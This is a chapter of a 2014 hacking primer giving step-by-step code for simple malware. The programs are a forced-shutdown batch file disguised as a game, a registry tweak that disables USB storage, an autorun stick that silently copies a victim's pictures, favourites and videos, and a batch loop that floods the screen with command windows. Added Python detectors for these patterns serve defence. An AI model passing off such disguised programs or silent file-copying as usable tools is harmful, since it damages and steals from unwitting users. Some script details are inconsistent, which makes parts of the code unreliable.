Creating virus - A Hacker's Life Starter: Security Penetration Anywhere & Anytime (2014)

Chapter 3. Creating virus

We will cover:

* Building your first virus file

* Creating a virus to disable USB ports

* Virus nested in the stick

* Getting started with Trojan

* Make a simple Trojan virus

A virus is the key to making a hacker’s dream come true in many ways.

In the last chapter we spoke a little about viruses; in this chapter we cover them in more detail, and by the end you will understand how to make one and how it operates.

Building your first virus file

Here you will create your first virus using Notepad. The task of the virus we will create is to shut down the operating system, and it will be cloaked behind a game icon. Give this virus to someone who can handle this prank.

1. Start by opening Notepad to type the text: Start->All Programs->Accessories->Notepad

2. Type this piece of code in notepad:

@echo off

echo Message here.

shutdown -s -f -t 60 -c "type a message you want to appear here

3. Save the file as “play this 3D game.bat”. When saving, change “Save file type:” to “All Files”, and then save (see Figure 3-1).

Figure 3-1 shows the Notepad Save dialog opened and the file type changed.

4. Go to the desktop and create a new shortcut, locate the bat file, then click Next.

5. Name it “play this 3D game” and finish.

6. Right click the shortcut->properties->Change Icon->choose one then OK.

The fake game app we created should be a virus that shuts down the user’s PC in a few seconds. And that’s how you create your very first virus using just Notepad.

Creating a virus to disable USB ports

The second virus you will create disables all USB ports of the computer. Here you will need to compile a C file into an executable one, meaning you will convert the .c file into an .exe file.

Setting up Borland C++

1. First off you need to download Borland C++ 5.5 or above.

2. After you install Borland C++ compiler, create two new Text Documents in Notepad.

3. Type these two lines in the first text file:

-I"c:\Borland\Bcc55\include"

-L"c:\Borland\Bcc55\lib"

4. Save changes and close the file. Now rename the first file to bcc32.cfg.

5. In the second text file type this:

-L"c:\Borland\Bcc55\lib"

6. Save changes and close the file. Now rename the first file to ilink32.cfg.

7. Put the two files in this directory: C:\Borland\BCC55\Bin

Creating the C file that blocks usb ports

1. Open Notepad, type this code and save it as “block_usb.c”:

#include <stdlib.h>

int main(void)
{
    /* Set the Start value of the USBSTOR service to 4. */
    system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\USBSTOR /v Start /t REG_DWORD /d 4 /f");
    return 0;
}

2. Place the file in C:\Borland\BCC55\Bin

3. Now open the command prompt (Start->Run->type cmd)

4. Type in:

cd C:\Borland\BCC55\Bin

5. Now compile the file by typing:

bcc32 block_usb.c

Creating virus that unblocks the USB ports.

Now that you’re done you should have a block_usb.exe file in the folder that hopefully blocks all the USB ports.

1. To enable all the USB ports again, replace the code in the “block_usb.c” file with this and compile again:

#include <stdlib.h>

int main(void)
{
    /* Set the Start value of the USBSTOR service back to 3. */
    system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\USBSTOR /v Start /t REG_DWORD /d 3 /f");
    return 0;
}
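From the monitoring side, both programs above show up as a reg.exe process whose command line rewrites the Start value of the USBSTOR service (the USB mass-storage driver), so the change can be caught in process-creation logs. The following is an added example, not code from the book: the function names and the sample command lines are constructed for illustration.

```python
import re

# Meanings of the Start value under a Services key (standard Windows semantics).
START_TYPES = {0: "boot", 1: "system", 2: "automatic", 3: "manual", 4: "disabled"}

REG_ADD = re.compile(r'\breg(?:\.exe)?"?\s+add\s+"?(?P<key>[^"/]+?)"?\s+/', re.I)
OPTION = re.compile(r'/(?P<opt>[vtd])\s+"?(?P<val>[^"\s]+)"?', re.I)

def parse_reg_add(cmdline):
    """Return (key, value_name, data) from a 'reg add' command line, or None."""
    m = REG_ADD.search(cmdline)
    if not m:
        return None
    opts = {o.group("opt").lower(): o.group("val")
            for o in OPTION.finditer(cmdline, m.end() - 1)}
    # reg.exe accepts both the long hive name and its abbreviation.
    key = re.sub(r"^HKEY_LOCAL_MACHINE", "HKLM", m.group("key").strip().upper())
    return key, opts.get("v", ""), opts.get("d", "")

def usbstor_start_change(cmdline):
    """Return (value, meaning) if cmdline rewrites USBSTOR's Start value, else None."""
    parsed = parse_reg_add(cmdline)
    if not parsed:
        return None
    key, name, data = parsed
    if not key.endswith("\\SERVICES\\USBSTOR") or name.lower() != "start":
        return None
    try:
        value = int(data, 16) if data.lower().startswith("0x") else int(data)
    except ValueError:
        return None, "unparsed data " + repr(data)
    return value, START_TYPES.get(value, "unknown")

# Constructed process-creation command lines (not captured from a real host).
SAMPLE_CMDLINES = [
    r'reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\USBSTOR /v Start /t REG_DWORD /d 4 /f',
    r'"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\USBSTOR" /v Start /t REG_DWORD /d 0x3 /f',
    r'reg add HKLM\SOFTWARE\ExampleVendor\App /v Start /t REG_DWORD /d 4 /f',
    r'reg query HKLM\SYSTEM\CurrentControlSet\Services\USBSTOR /v Start',
]

def scan(cmdlines):
    """Return (index, value, meaning) for each command line that rewrites USBSTOR Start."""
    changes = ((i, usbstor_start_change(c)) for i, c in enumerate(cmdlines))
    return [(i,) + change for i, change in changes if change]

if __name__ == "__main__":
    print(scan(SAMPLE_CMDLINES))
```

A write of 4 disables the driver and 3 restores on-demand loading; either one made outside a change window is worth a look, because writing under HKEY_LOCAL_MACHINE requires administrative rights.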

Virus nested in the stick

All the time I see viruses launching from a stick and starting to infect the computer. That I find really lame. What if you could make a virus launch from the stick and make it copy files to the stick silently? Won’t that be more useful? Well, today I’ll show you how to make one of those.

1. Insert your USB stick in the computer and navigate to it.

2. Create an empty text file in the root folder of the stick and once you’re done launch it. Type this code:

[autorun]

icon=drive.ico

open=launch.bat

action=Are you sure you want to run the game for windows?

shell\open\command=launch.bat

3. OK, that’s it. Save the file with a .inf extension.

4. Choose an appealing icon for the file and that’s it.

5. Create another text file and type this in it:

@echo off

:: variables

/min

SET odrive=%odrive:~0,2%

set backupcmd=xcopy /s /c /d /e /h /i /r /y

echo off

%backupcmd% "%USERPROFILE%\pictures" "%drive%\backup\My pics"

%backupcmd% "%USERPROFILE%\Favorites" "%drive%\ backup \Favorites"

%backupcmd% "%USERPROFILE%\videos" "%drive%\ backup \vids"

@echo off

cls

6. When you’re done save it as something but give it the extension .bat

7. We are almost done. Open another empty text file and type this:

CreateObject("Wscript.Shell").Run """" &

WScript.Arguments(0) & """", 0, False

8. Give the file a name (I used “hidden”) and save it with the extension .vps

9. Now this is the last step. As always, create and open a text file and type this:

wscript.exe \invisible.vbs file.bat

10. When you’re done save the file as “initiate” with the extension .bat

11. Last but not least create a folder in the stick next to the other files and name it “backup”

12. Now it should be done. Pull out the stick from the computer and insert it again and the autoplay window should pop up. Then click on run. (see Figure 5-8)

Figure 5-8 shows how the script runs in the terminal.

Note: It might give you an error message, but that’s OK; all the files were copied to the folder or are being copied.
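When triaging a removable drive, the file to read first is the autorun.inf in its root: the open=, shellexecute= and shell\<verb>\command= entries name what the drive asks Windows to run, and action= is the text shown to the user. The following is an added example, not code from the book: the function names and the second sample are constructed, and the first sample repeats the listing from step 2.

```python
SCRIPT_EXTS = (".bat", ".cmd", ".vbs", ".js", ".ps1")

def parse_autorun(text):
    """Return the [autorun] section as a dict with lower-cased keys."""
    section, entries = None, {}
    for raw in text.splitlines():
        line = raw.strip().lstrip("\ufeff")        # tolerate a UTF-8 BOM
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()   # section names are case-insensitive
        elif section == "autorun" and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries

def execution_entries(text):
    """List (key, command) pairs that ask Windows to run something."""
    hits = []
    for key, value in parse_autorun(text).items():
        is_verb = key.startswith("shell\\") and key.endswith("\\command")
        if key in ("open", "shellexecute") or is_verb:
            hits.append((key, value))
    return hits

def triage(text):
    """Summarise what an autorun.inf would execute and what it shows the user."""
    hits = execution_entries(text)
    targets = {cmd.split(" ")[0] for _, cmd in hits}
    scripts = sorted(t for t in targets if t.lower().endswith(SCRIPT_EXTS))
    return {"executes": hits, "script_targets": scripts,
            "prompt_text": parse_autorun(text).get("action")}

# The listing from step 2 of this section.
PAGE_SAMPLE = r"""[autorun]
icon=drive.ico
open=launch.bat
action=Are you sure you want to run the game for windows?
shell\open\command=launch.bat
"""

# Constructed sample: only cosmetic entries, nothing is executed.
BENIGN_SAMPLE = "[autorun]\nicon=drive.ico\nlabel=Backup\n"

if __name__ == "__main__":
    print(triage(PAGE_SAMPLE))
    print(triage(BENIGN_SAMPLE))
```

Setting the NoDriveTypeAutoRun policy value (under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer) to 0xFF turns AutoRun off for every drive type, so none of these entries is acted on.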

Getting started with Trojan

Most of us, or at least some, might think that a Trojan is a virus, but it’s not. A Trojan is a program like any other, also called malware, but one that performs malicious functions such as damaging the computer. Trojans do not have the ability to replicate themselves like viruses. But with a Trojan you can control a computer remotely and execute viruses on the computer.

These actions can include:

* Deleting Data

* Blocking Data

* Modifying Data

* Copying Data

* Disrupting the performance of computers or computer networks

Trojan backdoor

A Backdoor Trojan gives malicious users remote control over the infected computer. It enables the author to do anything they wish on the infected computer – including sending, receiving, launching, and deleting files, displaying data, and shutting down the computer.

Make a simple Trojan Horse

Now we will create a Trojan virus that keeps opening the command prompt 40 to 1000 times, depending on how many times you type “start”. The user can’t easily stop the windows from opening. But if they have an antivirus, the virus file can be detected.

1. Open Notepad, write “start” 50 times or many more, then save it as test.bat and test it in VirtualBox.

2. Make sure you don’t have an antivirus in the VirtualBox operating system. Now your antivirus should detect this bat file. If not, this could fill the user’s memory.

@echo off

A

Start

Start

Start

Start

Start

Start

Start

goto a
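Both batch files in this chapter, the shutdown prank and the window-spawning loop, have a shape that static triage of a .bat file can pick out before anyone double-clicks it: a shutdown command with a power-off flag, and an unconditional backward goto whose loop body launches processes. The following is an added example, not code from the book: the function names are hypothetical and all three sample scripts are constructed.

```python
import re

LABEL = re.compile(r"^\s*:(?!:)\s*(\w+)")            # ':a' is a label, '::' a comment
GOTO = re.compile(r"^\s*@?goto\s+:?(\w+)", re.I)      # unconditional goto only
SPAWN = re.compile(r"^\s*@?start\b", re.I)
SHUTDOWN = re.compile(r"^\s*@?shutdown(?:\.exe)?\b(.*)", re.I)

def shutdown_finding(args):
    """Classify the arguments of one shutdown command, or return None."""
    args = re.sub(r'"[^"]*"?', "", args)              # drop the -c message text
    flags = {f.lower() for f in re.findall(r"(?:^|\s)[-/](\w+)", args)}
    if not flags & {"s", "r", "p"}:
        return None                                    # e.g. 'shutdown -a' (abort)
    timeout = re.search(r"[-/]t\s+(\d+)", args, re.I)
    kind = "forced-shutdown" if "f" in flags else "shutdown"
    return kind, (int(timeout.group(1)) if timeout else None)

def triage_batch(text):
    """Return (kind, detail) findings for the text of one batch file."""
    findings, labels = [], {}
    lines = text.splitlines()
    for n, line in enumerate(lines):
        label, goto, shut = LABEL.match(line), GOTO.match(line), SHUTDOWN.match(line)
        if label:
            labels[label.group(1).lower()] = n
        elif shut and shutdown_finding(shut.group(1)):
            findings.append(shutdown_finding(shut.group(1)))
        elif goto and goto.group(1).lower() in labels:
            # Backward jump with no condition: count launches in the loop body.
            body = lines[labels[goto.group(1).lower()]:n]
            spawns = sum(1 for entry in body if SPAWN.match(entry))
            if spawns:
                findings.append(("spawn-loop", spawns))
    return findings

# Constructed samples for the two patterns, plus a benign retry loop.
SAMPLE_LOOP = "@echo off\n:a\nstart\nstart\nstart\ngoto a\n"
SAMPLE_SHUTDOWN = '@echo off\necho Message here.\nshutdown -s -f -t 60 -c "constructed message\n'
SAMPLE_BENIGN = ":retry\nping -n 2 127.0.0.1 >nul\nif not exist ready.txt goto retry\nstart notepad\n"

if __name__ == "__main__":
    for sample in (SAMPLE_LOOP, SAMPLE_SHUTDOWN, SAMPLE_BENIGN):
        print(triage_batch(sample))
```

The benign sample is not flagged because its goto sits behind an if condition; a pending prank shutdown can be cancelled during the countdown with shutdown -a.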

Small summary ahead

* There are viruses that can be used to shut down a computer

* Viruses can be used to disable USB ports

* A Trojan is not a virus but a program that performs malicious functions

* Backdoors are Trojans that give remote control over the user’s computer

* Virus can be used to transfer files to the stick